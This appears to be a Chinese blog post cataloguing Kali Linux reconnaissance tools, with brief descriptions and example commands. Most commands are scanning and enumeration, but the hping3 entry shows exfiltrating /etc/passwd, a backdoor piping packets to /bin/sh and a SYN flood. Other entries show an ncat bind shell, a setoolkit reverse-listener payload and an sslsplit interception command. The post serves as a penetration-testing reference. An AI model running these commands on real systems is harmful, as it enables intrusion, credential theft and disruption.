Kali Information Gathering

概述

Kali 里预装了很多安全与取证的相关工具,但是我所了解的却只有sqlmap、msf、nmap等少数几个,对于其他的却并没过多关注。于是今天想着整理一下Kali有关信息收集的工具,便于以后备查。

信息收集

acccheck:

描述:该工具被设计为一个密码字典攻击的工具,目标Windows身份验证通过SMB协议。

ace:

描述:不明。

amap:

描述:一个服务器枚举工具,使用这个工具可以识别正运行在一个指定端口或一个范围端口上的应用程序。
用法:

1
$ amap -bq 192.168.1.110 1-1000

Automater

描述:automater是分析URL的域名,IP地址,和MD5哈希OSINT工具。
用法:

1
2
$ automater baidu.com
$ automater -s robtex 50.116.53.73

braa

描述:一个SNMP的扫描工具
用法:

1
$ braa public@192.168.0.1:.1.3.6.*

casefile

描述:服务枚举:如DNS枚举
用法:

1
$ casefile

cdpsnarf

描述:网络嗅探器,从CDP数据包中提取信息
用法:

1
$ cdpsnarf -i eth0 -w cdpsnarf.pcap

cisco-torch

描述:快速发现远程Cisco的主机上运行Telnet、SSH、WEB、SNMP服务和启动NTP和字典攻击的服务发现。
用法:

1
$ cisco-torch -A 192.168.99.202

copy-router-config

描述:从思科设备上运行的SNMP拷贝配置文件。
用法:

1
$ copy-router-config.pl 192.168.1.1 192.168.1.15 private

dmitry

描述:收集可能的子域,电子邮件地址,正常运行时间的信息,TCP端口扫描,查找,和更多。
用法:

1
$ dmitry baidu.com

dnmap

描述:DNmap是一款基于Nmap的分布式框架,使用客户端/服务端架构,服务器接收命令并发送至客户端进行Nmap安全扫描,扫描完毕后,客户端返回扫描结果。
用法:

1
2
3
4
5
6
7
8
# dnmap_server:
$ echo "nmap -F 192.168.1.0/24 -v -n -oA sub1" >> dnmap.txt
$ echo "nmap -F 192.168.0.0/24 -v -n -oA sub0" >> dnmap.txt
$ dnmap_server -f dnmap.txt
# dnmap_client:
# (dnmap_server的ip)(dnmap_client的别名)
$ dnmap_client -s 192.168.1.15 -a dnmap-client1

dnsenum

描述:枚举域DNS信息和发现不连续的IP模块。
用法:

1
$ dnsenum --noreverse -o mydomain.xml example.com

dnsmap

描述:枚举域DNS信息。
用法:

1
$ dnsmap example.com -w /usr/share/wordlists/dnsmap.txt

dnsrecon

描述:直接出来目标服务器的 DNS名字 和 IP
用法:

1
$ dnsrecon -d example.com -D /usr/share/wordlists/dnsmap.txt -t std --xml dnsrecon.xml

dnstracer

描述:直接出来目标服务器的 DNS名字 和 IP
用法:

1
$ dnstracer -r 3 -v example.com

dnswalk

描述:DNS的调试器。它执行特定区域的区域传输,并检查数据库在许多方面的内部一致性,以及准确性。
用法:

1
2
$ dnswalk example.com.
$ dnswalk -r -d example.com.

dotdotpwn.pl

描述:测试发现软件例如HTTP、FTP、TFTP服务器遍历目录的漏洞,网络平台如CMS、ERP、博客等。
用法:

1
$ dotdotpwn.pl -m http -h 192.168.1.1 -M GET

enum4linux

描述:枚举Windows主机和Samba 主机。
用法:

1
$ enum4linux -U -o 192.168.1.200

enumiax

描述: Inter Asterisk Exchange 协议 的用户名蛮力枚举。 enumiax可能在两种不同的模式操作; 顺序用户名猜测或字典攻击。
用法:

1
$ enumiax -d /usr/share/wordlists/metasploit/unix_users.txt 192.168.1.1

Fierce

描述: ip 扫描器
用法:

1
$ fierce -dns example.com

fragroute

描述: fragroute能够截取、修改和重写向外发送的报文,实现大部分在了Secure Networks Inser
tion, Evasion, and Denial of Service: Eluding Network Intrusion Detection中叙述的
IDS欺骗技术,包括IP、TCP层的数据包碎片以及数据包数据重叠等。
用法:

1
2
3
4
5
# fragroute:
$ fragroute 192.168.1.123
# fragtest :
$ fragtest ip-tracert frag-new 192.168.1.123

ghost-phisher

描述: 是无线和以太网的安全审计和攻击软件
用法:

1
$ ghost-phisher

GoLismero

描述: web漏洞扫描
用法:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
# 扫描一个网站,并显示在屏幕上的结果:
$ golismero scan http://www.0535code.com
# 获取nmap结果,扫描发现所有主机写HTML报告:
$ golismero scan -i nmap_output.xml -o report.html
# 获取结果OpenVAS和它们显示在屏幕上,但不扫描任何东西:
$ golismero import -i openvas_output.xml
# 显示所有可用配置文件的列表:
$ golismero profiles
# 显示所有可用插件的列表:
$ golismero plugins
# 显示所有信息和插件:
$ golismero info brute_*
# 从以前的扫描中转储数据库:
$ golismero dump -db example.db -o dump.sql

hping3

描述: hping是安全审计、防火墙测试等工作的标配工具。hping优势在于能够定制数据包的各个部分,因此用户可以灵活对目标机进行细致地探测。
用法:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# 使用Hping3指定各种数据包字段,依次对防火墙进行详细测试。
$ hping3 -S -c 1000000 -a 10.10.10.10 -p 21 10.10.10.10
# 端口扫描
$ hping3 -I eth0 -S 192.168.10.1 -p 80
# 对目标机发起大量SYN连接
$ hping3 -I eth0 -a192.168.10.99 -S 192.168.10.33 -p 80 -i u1000
# 文件传输
# 接收端:
$ hping3 192.168.1.159 --listen signature --safe --icmp
# 发送端:
$ hping3 192.168.1.108 --icmp -d 100 --sign signature --file /etc/passwd
# 木马功能
# 被控制端:
$ hping3 127.0.0.1 --listen signature --safe --udp -p 12345 | /bin/sh
# 控制端:
$ echo ls > test.cmd
$ hping3 127.0.0.1 -p 12345 -d 100 --udp --sign signature --file ./test.cmd

intrace

描述:InTrace 是一个类似 traceroute 的应用,用户可以针对已建立的 TCP 连接跟踪其 IP 的跳跃。
用法:

1
$ intrace -h www.example.com -p 80 -s 4

lbd

描述:检测是否一个给定的域使用DNS或HTTP负载平衡(通过服务器:日期:服务器响应头和之间的差别)。
用法:

1
$ lbd example.com

maltego

描述:收集DNS信息等。
用法:

1
$ maltego

masscan

描述:快速的端口扫描工具。
用法:

1
2
3
4
5
6
# 扫描202.203.122.122的80端口,速率为10Kpps
$ masscan -p 80 202.203.122.122 --rate=10000 
# 扫描202.203.122.122的0-8100的端口,扫描结果输出到output.txt(二进制)(--banners选项值旗标,或者指纹)
$ masscan -p 0-8100 202.203.122.122 --banners -oB output.txt 
# 打开显示模式,读取output.txt中的数据,并以xml的格式写到2.txt中
$ masscan --open --banners --readscan output.txt -oX 2.txt

Miranda

描述:操作系统探测工具。
用法:

1
2
3
4
5
6
7
# 打开网卡eth0
$ miranda -v -i eth0
# 自动搜索upnp主机
upnp> msearch
upnp> host list
# 查看该主机的upnp设备列表
upnp> host get [index]

nmap

描述:网络探测工具和安全/端口扫描器。
用法:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
$ Nmap [ 扫描类型 ... ] [ 通用选项 ] { 扫描目标说明 }
$ nmap -v -A -sV 192.168.1.1
# 全面扫描:
$ nmap -T4 -A targetip
# 主机发现:
$ nmap -T4 -sn targetip
# 端口扫描:
$ nmap -T4 targetip
# 服务扫描:
$ nmap -T4 -sV targetip
# 操作系统扫描:
$ nmap -T4 -O targetip
# SYN扫描:
$ nmap -sS -T4 targetip
# FIN扫描:
$ nmap -sF -T4 targetip
# ACK扫描:
$ nmap -sA -T4 targetip
# UDP扫描:
$ NMAP -sU targetip
# 漏洞扫描:
$ nmap -sS -sV --script=vulscan/vulscan.nse target
$ nmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv target
$ nmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv -p80 target
$ nmap -PN -sS -sV --script=vulscan –script-args vulscancorrelation=1 -p80 target
$ nmap -sV --script=vuln target
$ nmap -PN -sS -sV --script=all –script-args vulscancorrelation=1 target

nping

描述:网络数据包生成工具/平实用程序。
用法:

1
$ nping --tcp -p 22 --flags syn --ttl 2 192.168.1.1

ndiff

描述:实用工具Nmap扫描的结果比较。
用法:

1
$ ndiff yesterday.xml today.xml

ncat

描述:连接和重定向的套接字。
用法:

1
$ ncat -v --exec "/bin/bash" --allow 192.168.1.123 -l 4444 --keep-open

p0f

描述:是一款被动探测工具,通过分析网络数据包来判断操作系统
用法:

1
$ p0f -i eth0 -p -o /tmp/p0f.log

Recon-ng

描述:与msf类似,Recon-ng框架是一个强大的工具,使用它可以自动的收集信息和网络侦查。
用法:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ recon-ng
# 查看所有命令:
[recon-ng][default]> help
# 查看所有有效的模块列表:
[recon-ng][default]> show modules
# 使用recon/domains-hosts/baidu_site模块,枚举baidu网站的子域:
[recon-ng][default]> use recon/domains-hosts/baidu_site
# 查看该模块下可配置选项参数:
[recon-ng][default][baidu_site]> show options
# 配置SOURCE选项参数:
[recon-ng][default][baidu_site]> set SOURCE baidu.com
# 启动信息收集:
[recon-ng][default][baidu_site]> run
# 查看获取的数据:
[recon-ng][default]> use reporting/csv
# 创建报告:
[recon-ng][default][csv]> run

searchsploit

描述: 从Exploit Database搜索exp
用法:

1
2
$ searchsploit oracle windows remote
$ searchsploit linux kernel 2.6

setoolkit

描述: 社会工程师工具包
用法:

1
2
3
4
5
6
7
8
9
$ setoolkit
# 根据自己的需要,选择相应的编号进行操作:
set> 1
set> 4
# 根据自己的目标系统选择相应的攻击载荷:
set:payloads> 2
# 输入攻击者的ip、端口:
set:payloads> IP address for the payload listener (LHOST):192.168.0.212
set:payloads> Enter the PORT for the reverse listener:1234

smtp-user-enum

描述: SMTP用户枚举是一个工具,用于枚举操作系统级别的用户帐户在Solaris通过SMTP服务(邮件)。
用法:

1
$ smtp-user-enum -M VRFY -u root -t 192.168.1.25

snmpcheck

描述: SNMP枚举工具。
用法:

1
$ snmpcheck -t 192.168.1.2 -c public

sslcaudit

描述: 实用的自动化测试的SSL / TLS的客户端来抵抗中间人攻击。
用法:

1
$ caudit -l 0.0.0.0:443 -v 1

SSLsplit

描述: 中间人攻击,将https协议强制替换为http。。
用法:

1
$ sslsplit -D -l connections.log -j /tmp/sslsplit/ -S /tmp/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080

SSLyze

描述: 是一款使用Python实现的SSL扫描工具,它可以扫描出SSL中一些经典的配置错误。
用法:

1
$ sslyze --regular www.example.com

theharvester

描述: 邮箱挖掘器。
用法:

1
$ theharvester -d kali.org -l 500 -b google

tlssled

描述: TLSSLed是一个Linux bash脚本,它的功能是测试目标SSL/TLS(HTTPS)WEB 服务器的安全性。TLSSLed基于sslscan,功能包括:测试目标是否支持SSLv2协议、NULL cipher等等。
用法:

1
$ tlssled 192.168.1.1 443

tshark

描述: 可以直接过滤数据包导出
用法:

1
$ tshark -f "tcp port 80" -i eth0

urlcrazy

描述: 钓鱼域名。
用法:

1
$ urlcrazy -k dvorak -r example.com

whatweb

描述: WhatWeb是一款网站指纹识别工具,主要针对的问题是:“这个网站使用的什么技术?”WhatWeb可以告诉你网站搭建使用的程序,包括何种CMS系统、什么博客系统、Javascript库、web服务器、内嵌设备等。WhatWeb有超过900个插件,并且可以识别版本号、email地址、账号、web框架、SQL错误等等。
用法:

1
$ whatweb www.example.com

Wireshark

描述: 流量分析。
用法:

1
$ wireshark

xspy

描述: 键盘记录器
用法:

1
$ xspy

yersinia

描述: 是国外的一款专门针对交换机执行第二层攻击的一个攻击工具。
用法:

1
$ yersinia -G

zaproxy

描述: 一个易于使用交互式的用于web应用程序漏洞挖掘的渗透测试工具。
用法:

1
$ zaproxy